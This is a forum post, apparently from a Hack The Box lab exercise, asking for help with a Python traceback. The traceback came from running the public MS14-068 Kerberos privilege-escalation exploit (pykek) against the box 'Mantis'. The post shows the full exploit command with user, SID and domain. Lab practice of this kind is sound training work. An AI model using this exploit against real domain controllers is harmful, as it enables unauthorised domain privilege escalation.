So I’m following the ippsec guide through for this one - quite a nice box. However, when running the exploit I get errors. I’ve cloned this: git clone GitHub - SecWiki/windows-kernel-exploits: windows-kernel-exploits (a collection of Windows privilege-escalation exploits)
Then from /opt/windows-kernel-exploits/MS14-068/pykek I’m running the exploit:
python ms14-068.py -u james@HTB.LOCAL -s S-1-5-21-4220043660-4019079961-2895681657-1103 -d MANTIS
enter password
Then the following errors:
[+] Building AS-REQ for MANTIS... Done!
[+] Sending AS-REQ to MANTIS... Done!
[+] Receiving AS-REP from MANTIS... Done!
[+] Parsing AS-REP from MANTIS...Traceback (most recent call last):
  File "ms14-068.py", line 189, in <module>
    sploit(user_realm, user_name, user_sid, user_key, kdc_a, kdc_b, target_realm, target_service, target_host, filename)
  File "ms14-068.py", line 48, in sploit
    as_rep, as_rep_enc = decrypt_as_rep(data, user_key)
  File "/opt/windows-kernel-exploits/MS14-068/pykek/kek/krb5.py", line 431, in decrypt_as_rep
    return _decrypt_rep(data, key, AsRep(), EncASRepPart(), 8)
  File "/opt/windows-kernel-exploits/MS14-068/pykek/kek/krb5.py", line 419, in _decrypt_rep
    rep = decode(data, asn1Spec=spec)[0]
  File "/opt/windows-kernel-exploits/MS14-068/pykek/pyasn1/codec/ber/decoder.py", line 792, in __call__
    stGetValueDecoder, self, substrateFun
  File "/opt/windows-kernel-exploits/MS14-068/pykek/pyasn1/codec/ber/decoder.py", line 55, in valueDecoder
    value, _ = decodeFun(head, asn1Spec, tagSet, length)
  File "/opt/windows-kernel-exploits/MS14-068/pykek/pyasn1/codec/ber/decoder.py", line 798, in __call__
    '%r not in asn1Spec: %r' % (tagSet, asn1Spec)
pyasn1.error.PyAsn1Error: TagSet(Tag(tagClass=0, tagFormat=32, tagId=16), Tag(tagClass=64, tagFormat=32, tagId=30)) not in asn1Spec: AsRep()
Any help would be really appreciated,
Bwebzy